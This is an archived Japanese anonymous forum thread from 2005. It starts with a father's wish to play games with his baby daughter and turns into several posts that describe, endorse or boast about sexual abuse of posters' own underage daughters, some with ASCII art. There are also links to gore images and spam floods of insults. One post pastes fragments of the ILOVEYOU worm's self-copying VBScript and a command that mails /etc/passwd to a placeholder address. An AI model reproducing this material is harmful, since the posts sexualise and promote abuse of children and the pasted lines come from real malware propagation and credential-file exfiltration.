2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

娘としたい

1 :名無しさん@お腹いっぱい。:2005/05/02(月) 22:00:38
娘、まだしゃべれないんだけど、かわいいんだよな。
俺、天下のニンテンドーからのゲーマーで、娘とゲームしたくて。
かわいい娘、あと何年したら、ジョイパッド、握れるかな。
俺とゲームしてくれるかな。
でも、こんなかわいい娘が、ほかの男とプレイするのは許せん。
娘は父親のものだ。

2 :名無しさん@お腹いっぱい。:2005/05/02(月) 22:03:02
親父は誰のものだろう。

3 :名無しさん@お腹いっぱい。:2005/05/02(月) 22:09:11
お父さん、娘さんを下さい?

4 :名無しさん@お腹いっぱい。:2005/05/02(月) 22:11:13
>>ばかー!
どこの馬の骨でもビルゲイツでも、娘は渡さん!

5 :名無しさん@お腹いっぱい。:2005/05/02(月) 22:12:59
娘はかわいい。

6 :名無しさん@お腹いっぱい。:2005/05/02(月) 22:14:10
目の中に入れてもって言葉あるけど、そのとおりだよな。
目をくれって言われたら、身の回り片付けてあげちゃう。

7 :名無しさん@お腹いっぱい。:2005/05/02(月) 22:15:26
人の娘をもらっちゃいました。

8 :名無しさん@お腹いっぱい。:2005/05/02(月) 22:18:32
俺の娘に手を出したら、一族郎党地獄の責め苦を覚悟しろw

9 :名無しさん@お腹いっぱい。:2005/05/02(月) 22:19:47
背中に書いとくれ。

10 :名無しさん@お腹いっぱい。:2005/05/02(月) 22:21:35
>>9
なんて彫ればいい?
チャラ男除けなら、考えちゃうよ?

11 :名無しさん@お腹いっぱい。:2005/05/02(月) 22:23:10
>>10
手出し無用

12 :名無しさん@お腹いっぱい。:2005/05/02(月) 22:24:46
でも、出す奴は出すだろ?
お父さん、心配で心配で、夜も眠れないから、あとはご自由に。

13 :名無しさん@お腹いっぱい。:2005/05/02(月) 22:25:16
出すなら腹に。

14 :名無しさん@お腹いっぱい。:2005/05/02(月) 22:46:31
畜生どもめ。寸止めとかコンドーとかで許すと思うなよ。
岡本ラテックスで、玉袋まで装着してても許さん。

15 :名無しさん@お腹いっぱい。:2005/05/02(月) 22:49:01
娘とどこまで進んでいるんだ?なんて聞けない

16 :名無しさん@お腹いっぱい。:2005/05/02(月) 22:51:52
ばかやろー、ネタスレで15で落ちたいのか?
もちっと進んでから聞こうね?
娘18、矢口は出花・・・じゃないな。

17 :名無しさん@お腹いっぱい。:2005/05/02(月) 22:53:11
一度おちたんだろ?
違いのわかる男

18 :名無しさん@お腹いっぱい。:2005/05/02(月) 22:56:59
なにがおちたの?
わたちこどもだからわかんない。
おじちゃん、おちえて。
あれ、おじちゃん、なんか、はれてる。
どく?ぬかなきゃ。うぐ、うぐ。

19 :名無しさん@お腹いっぱい。:2005/05/02(月) 22:57:43
はよ寝ろ

20 :名無しさん@お腹いっぱい。:2005/05/02(月) 23:01:44
寝ろってんだ

21 :名無しさん@お腹いっぱい。:2005/05/02(月) 23:02:37
テンダー寝す

22 :名無しさん@お腹いっぱい。:2005/05/02(月) 23:13:58
あのAA、ないの?
むさい顔が作ってあって、娘として、何が悪いんだ、ってやつ。
落ちたから、持ってないんだ。

23 :名無しさん@お腹いっぱい。:2005/05/02(月) 23:15:46
ないよ

24 :名無しさん@お腹いっぱい。:2005/05/03(火) 00:18:08
あれ、このスレ1000逝ったの?

25 :名無しさん@お腹いっぱい。:2005/05/03(火) 13:34:01
すでに>>1の意向と別方向に逝きつつあるスレ
スレタイ ヤバいよ

26 :名無しさん@お腹いっぱい。:2005/05/03(火) 22:52:21
俺の娘は中3だが、最近の成長ぶりにはムラムラくるぜ。
すでに使用済みのナプキンをゲットしてしゃぶりまくってやった。
そしたらチンポがピンダチになりよって、凄まじいセンズリをこいた。
娘が高校生になったらマンコをしようと思っている。父親の義務だ!

27 :名無しさん@お腹いっぱい。:2005/05/03(火) 22:54:23
氏んでもらえませんか?

28 :名無しさん@お腹いっぱい。:2005/05/03(火) 23:14:45
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"




29 :名無しさん@お腹いっぱい。:2005/05/04(水) 01:52:18
長い長い連休中でも、
淫手る・センズリーノテクノロジーは、あなたを天国に導きます。

30 :名無しさん@お腹いっぱい。:2005/05/04(水) 01:52:51
ああ、娘とオメコがしたい。娘のオメコの奥まで舌を突っ込んで舐めまわしたい。
最近胸もふくらんできたし、何よりも女の匂いがプンプンするからたまらねぇ。
女も小6になると妙に男心をくすぐるからいけませんなぁ。もうチンポがベトベトですわ。

31 :名無しさん@お腹いっぱい。:2005/05/04(水) 01:56:40
さっそくセンズリーノ・テクノロジーを体感してくださって、ありがとうございます。
ほかにご要望は?

32 :名無しさん@お腹いっぱい。:2005/05/04(水) 01:59:45
娘と死体

http://i-bbs.sijex.net/imageDisp.jsp?id=gumo&file=1108910212197o.jpg



33 :名無しさん@お腹いっぱい。:2005/05/04(水) 03:48:44
>>32
このスレはエロは認めるがグロは認めない。よってこの様な画像は認められない。
おまえを排除するつもりはないが、ここに来るんだったらここの趣旨に従ってくれ。

34 :名無しさん@お腹いっぱい。:2005/05/04(水) 07:57:53
ついに石川まで卒業か

35 :名無しさん@お腹いっぱい。:2005/05/04(水) 16:45:08
ゲーマーズスレじゃないの??

36 :名無しさん@お腹いっぱい。:2005/05/05(木) 01:15:36
怖くてしょうがないんだ。
何歳くらいから、かわいい娘が、お父さん臭い、とか、あっち行って、とか言い出すんだろう?
友達によるのかな?それとも、成長期には当然のことなのかな?
でも、俺の友人なんか、中学の娘がもう処女じゃない、って肩落としてた。
怖くて、想像できないんだ。

37 :名無しさん@お腹いっぱい。:2005/05/05(木) 01:46:46
だから娘とマンコする必要があるんだ。
今のうちに娘のマンコにチンポをぶち込むんだ。

38 :名無しさん@お腹いっぱい。:2005/05/05(木) 03:01:54
http://jbbs.livedoor.jp/sports/6471/

39 :名無しさん@お腹いっぱい。:2005/05/05(木) 04:22:45
なに、このスレ
変態ばっか、キショイー

40 :名無しさん@お腹いっぱい。:2005/05/05(木) 05:38:31
ヤリまくり

41 :名無しさん@お腹いっぱい。:2005/05/05(木) 19:23:35
(^O^)/フェラチオ大好き〜

42 :43:2005/05/05(木) 19:26:30
後輩が30代中頃で娘が4歳くらいのとき言われてショック受けてた。

43 :名無しさん@お腹いっぱい。:2005/05/05(木) 19:51:30
     ,.r<弌ヾヾヾヾヾヾ`ト`、-、__
    /-ニニヘヾヾヾヾヾヾヾヾヾヾ`ー-、
   ./ー二e `゙ `゙ ゙`ヾヾヾヾヾヾヾヾ、シナヘ
  仁一彡       ゙、ヾ、ヾヾ ゙ヘイ〃メ入
  f‐ニ=ツ ,.'   - 、  B       チ彡ニ┤
  !彡ニヽ   ` ー -- 二 _ー_--    三ニ-}
  V;〃ラ  /〃ニー        ̄   メ二ーヲ
  ハテj   ,. ニ、  、    、tヘヾi、 ヾミニソ
  .l. レ   < (・) > .;  .;:'  ,.= 、   lミ,‐ヲ
  ! l   、  ̄  ,! .i  < (・) >   レ' ノ
  l ト 、  ` '"´ ,!  l  、  ̄ ,   : ,j    娘とオメコして何が悪いんだ?       
  `1゙ヽ      ,!  l   ` ´  ,.イ ,/     娘も期待して待ってるんだぞ!
   l ';  ,.:' (´,、 ,. ヽヾ    ,.:' /`   
   .| ; ,:'   `   ´ ′ヽ  ,.' /       
     ! ; ,.'  _,,,_ __    ;  ;' /      
    ',  ゙、"ー-ニニニ=ヽ  ,.' /                  
    ヽヾ `ー--'''ー-一''′ /            
     `ヽ、    、 _ノ/        
        ` ー--一''''"´   ああ、娘のオメコは気持ちがいい。体の相性もいいしもう最高だ!
                   それにオメコのヒダヒダがチンポに絡み付いてくるし、よく締まるわな。
                  こんな気持ちいい事やめられまっかいな。近親相姦こそ最高のオメ行為だ!!


44 :名無しさん@お腹いっぱい。:2005/05/06(金) 00:39:34
よっしゃ、いただき!
でも、これ↑モデル誰なの?

45 :名無しさん@お腹いっぱい。:2005/05/06(金) 01:06:06
野中に似てるな。

46 :43:2005/05/06(金) 17:57:15
>>44
なんでこんなブサイクなAAがほしいんだよ?
ただの下品なおっさんじゃないか。

47 :43:2005/05/06(金) 23:11:14
>>44
おまえ22だろ。欲しがってたから載せてやったんだよ。礼くらい言えや!!

48 :名無しさん@お腹いっぱい。:2005/05/06(金) 23:45:45
>>47
それは済まなかった。
ありがとう!礼が遅れてごめんね!
ところでモデルは誰?

49 :名無しさん@お腹いっぱい。:2005/05/06(金) 23:49:32

「教材の是非はともかく、性教育の現場は間違いなく行き過ぎと思います。今や小学1年生に『ペニス』や
『ワギナ』を覚えさせるのは当たり前、男性器と女性器を備えた人形でセックスの仕方を教えたり、コンドーム
のつけ方実習に生理用ナプキンの用途、男性器の模型から牛乳を飛ばして“射精”を実演する授業が
全国ではびこっている。男女共同参画法の施行(01年)で『ジェンダーフリー』がブームになって以来、
男女間の性差別をなくそうとランドセルの色まで同じにする学校が増えた。性の問題も男女を分けず、
あえて小さいうちからオープンに教えようというのですが、どう見ても早すぎますよ」

教育関係者によると、「はい、みんな一緒に〜セックス! セックス!」と小学4年の子どもに大声で連呼
させていた教師が都内の私立小学校にいたが、「教師は『いのちの授業』と主張し謝罪しませんでした」という。
こうした性教育は「保健」や「生活」「道徳」の授業を通して、多い学校で年間約30時間も行われるから
ビックリだ。その一方、「ゆとり教育」「学校週5日制」で肝心の学科の授業時間が減り、子どもの学力は
低下するばかり。



はい、みんな一緒に〜


    ∧_∧
    (゚∀゚  )ー┐ セックス! セックス!
    しヽ   し′
    彡 >  彡) 
      /  / /
     (_(__)
    ∧_∧ 
 ┌ー(  ゚∀゚)セックス! セックス!
  丶J   /J
   ( ミ   < ミ
   丶 丶 丶
   (__)_)


50 :名無しさん@お腹いっぱい。:2005/05/06(金) 23:55:37
          |:::::::メ   ........        ......,   ヾ:::::::::::|
          |:::ノ   /   ヽ    /   ヽ ミ::::::::::|
          |::| /    _       _    ヾ::::::l
          |::|    イ(:::)ヽ     イ(:::)メ    |::::::|
          |ノ i    `ー'ノ i    ヽ` ~    イ::イ
          | j }    ~~  ノ;            い
          ゝ:.:.{: . : .    γ    ,、 )、      i丿
          厶:.:.ヾ : .    ` ''`  ~   ヽ     ノつ  だからこそ近親相姦による性教育が重要なんだ!!
          /i:.:.:.:. : .       ,_    i    /
        /  ヘ:.:.:. : .  i   ハニエ!-!‐ヽ |    ,イゝ、__
      /|     ヘ:.: .  │〈.:.:.:.:.:.:.:.:.:.:ノ ノ    /   \:;:- 、 _
    /:;:;:;:;ヽ     ヽ   ! ヾエエEァ´     /      i:;:;:;:;:;:;:;\


51 :名無しさん@お腹いっぱい。:2005/05/06(金) 23:56:32
この動作、ひとむかし前、どっかで見たんだが・・・
コマネチ、コマネチじゃないし、
ハッスルハッスル、でもないし・・・
なんだろう?

52 :名無しさん@お腹いっぱい。:2005/05/07(土) 20:04:49
ハッスルハッスル

ttp://www.cnd.org/HYPLAN/yawei/june4th/bj20.jpg
ttp://www.cnd.org/HYPLAN/yawei/june4th/wmr1a.jpg
ttp://www.cnd.org/HYPLAN/yawei/june4th/bj10.jpg
ttp://www.cnd.org/HYPLAN/yawei/june4th/bj22.jpg
ttp://www.cnd.org/HYPLAN/yawei/june4th/bj12.jpg
ttp://www.cnd.org/HYPLAN/yawei/june4th/bj14.jpg
ttp://www.cnd.org/HYPLAN/yawei/june4th/zm2b.jpg



53 :名無しさん@お腹いっぱい。:2005/05/07(土) 20:37:54
>>52
おまえな、人が不快になる様な画像出すなや。
なんやったら、おまえ名乗り出てこいや。
おまえが大好きな様に血みどろにしたるさかい。

54 :名無しさん@お腹いっぱい。:2005/05/07(土) 23:19:59
自分の娘とマンコやりたい、またはやってる香具師はおらんのかね?
ここでは常時、経験談を募集しております。

55 :名無しさん@お腹いっぱい。:2005/05/07(土) 23:22:14
ゲーム。。

56 :1:2005/05/08(日) 01:41:31
>>54
募集してないよ。

57 :名無しさん@お腹いっぱい。:2005/05/08(日) 18:16:48
今日もやったよ

58 :名無しさん@お腹いっぱい。:2005/05/10(火) 00:31:41
俺の娘は中1だが毎晩マンズリをこいている。この前遂に現場を押さえてやった。
そして恥らう娘に対して「お父さんがもっと気持ちよくしてやろう」と言って、
娘のマンコにむしゃぶりついてやった。娘はイク直前だったらしく、クリトリスを
しゃぶってやるとすぐにイッてしまった。その夜は明け方まで娘をかわいがってやった。
それからの娘は俺の女になった。もう少し成熟したらちんぽの味を教えてやろうと
思っている。娘の体を開発するのが父親の役目だ。娘もそれを望んでいるだろう。

59 :名無しさん@お腹いっぱい。:2005/05/13(金) 04:41:29
これこそが父と娘の理想的な関係。
l     ,'  l   l
          ,'     ,'   l  l          . - _
       // ,'      ,'_,..,_ l,  ヽ     ノ´//⌒ ミヾヽ、_ ィィ・・イキソウ・・・
     //,r'´     ,r'´   `ヽ、、、`;ニ三彡´〃   ! ゙ゞヾ、_`ヽ
     (({ グチュ {       ````  /´  {  l  | // ヽ`ーr' }
  パン パン ! ズチャ !    `、     '   ノ  l. ||l     i l / l
       ',     ; ',      | ̄``''''ー―- ,'´l  l |!` ‐--| l l l
         ',     l ',    |             l  l  |    リ,! l
       i     ; ',   |          | | ,!    ' リ
,,,,--−---、ノ     ,'___',   |          |. |    ゚。
           ,'' ´ `ヽ   !         | |
、、....___ .....,r'-......__ ,.r'             | '''"''‐-、


60 :名無しさん@お腹いっぱい。:2005/05/14(土) 00:03:36
これこそが父と娘の理想的な関係。
l     ,'  l   l
          ,'     ,'   l  l          . - _
       // ,'      ,'_,..,_ l,  ヽ     ノ´//⌒ ミヾヽ、_ ィィ・・イキソウ・・・
     //,r'´     ,r'´   `ヽ、、、`;ニ三彡´〃   ! ゙ゞヾ、_`ヽ
     (({ グチュ {       ````  /´  {  l  | // ヽ`ーr' }
  パン パン ! ズチャ !    `、     '   ノ  l. ||l     i l / l
       ',     ; ',      | ̄``''''ー―- ,'´l  l |!` ‐--| l l l
         ',     l ',    |             l  l  |    リ,! l
       i     ; ',   |          | | ,!    ' リ
,,,,--−---、ノ     ,'___',   |          |. |    ゚。
           ,'' ´ `ヽ   !         | |
、、....___ .....,r'-......__ ,.r'             | '''"''‐-、


61 :名無しさん@お腹いっぱい。:2005/05/14(土) 01:28:29
l     ,'  l   l
          ,'     ,'   l  l          . - _
       // ,'      ,'_,..,_ l,  ヽ     ノ´//⌒ ミヾヽ、_ ィィ・・イキソウ・・・
     //,r'´     ,r'´   `ヽ、、、`;ニ三彡´〃   ! ゙ゞヾ、_`ヽ
     (({ グチュ {       ````  /´  {  l  | // ヽ`ーr' }
  パン パン ! ズチャ !    `、     '   ノ  l. ||l     i l / l
       ',     ; ',      | ̄``''''ー―- ,'´l  l |!` ‐--| l l l
         ',     l ',    |             l  l  |    リ,! l
       i     ; ',   |          | | ,!    ' リ
,,,,--−---、ノ     ,'___',   |          |. |    ゚。
           ,'' ´ `ヽ   !         | |
、、....___ .....,r'-......__ ,.r'             | '''"''‐-、


62 :名無しさん@お腹いっぱい。:2005/05/16(月) 12:29:42
            __,,..、、- - - .、、...,,___
       ,,、‐''"~ ̄            ̄``''‐、、
     /                      \
    /                         ヽ
   /                           ヽ
   /  / ~~` '' ‐- 、、 ,,__   __ ,,..、、 -‐ '' "~~\  ヽ
   |  /    __           ̄       __   ヽ  |
  .|  {  ´   ‐- ....__    __... -‐   `   } .|
  .|  〉,,・^'' - .,,      ~  i ~    __,,.- ^`・、.〈  |
./ ̄|  /,/~ヽ、  `'' ‐--‐ ,.| 、‐-‐'' "~   _ノ~\,ヽ | ̄ヽ
| (` | / ヽ,,_____`‐-、_、..,,___ノ八ヽ___,,.._-‐_'"´___,, ノ ヽ .|'´) |
| }.| ./'   \二二・二../ ヽ  / ヽ、二・二二/  'ヽ | { |
.| //| .|          / |  |. \         | |ヽヽ|
.| .| | .|        /    |  |.    \       | | | .|
|ヽ.| |      /     .|  |.     ヽ      .| .|./ .|
 |  .| |     /      |  |        ヽ     |  | /
 ヽ .| |    /       .|  |       ヽ    |  | /
  .ヽ.| |    /     '二〈___〉二`       ヽ   |  |./
    | |          `-;-′         |  |     |
     iヽ|.      ,,... -‐"`‐"`'‐- 、、     |/i
     |  ヽ     /...---‐‐‐‐‐----.ヽ    /  .|
     |   ヽ.    ,, -‐ ''"~ ~"'' ‐- 、    /   |
    .|    ヽ         !          ./   .|
    ,,|     ヽ.         |        ./     |、
    |\.     ヽ            /     /.|
   .|.  \.      ヽ、____   ___/    /   .|
   '     `            ̄ ̄       ´     '
    俺は娘とやりてぇんだよ!もうちんぽが我慢汁でドロドロだ!!


63 :名無しさん@お腹いっぱい。:2005/05/16(月) 12:40:54
お前40代板の恥さらしベストワンだな。
お前の娘は俺の息子が喜ばすさ。糞低能野郎が。

64 :名無しさん@お腹いっぱい。:2005/05/16(月) 12:44:51
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け



65 :名無しさん@お腹いっぱい。:2005/05/16(月) 12:46:03
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け

66 :名無しさん@お腹いっぱい。:2005/05/16(月) 12:50:53
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け




67 :名無しさん@お腹いっぱい。:2005/05/16(月) 12:51:37
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け




68 :名無しさん@お腹いっぱい。:2005/05/16(月) 12:52:09
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け




69 :名無しさん@お腹いっぱい。:2005/05/16(月) 12:53:39
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
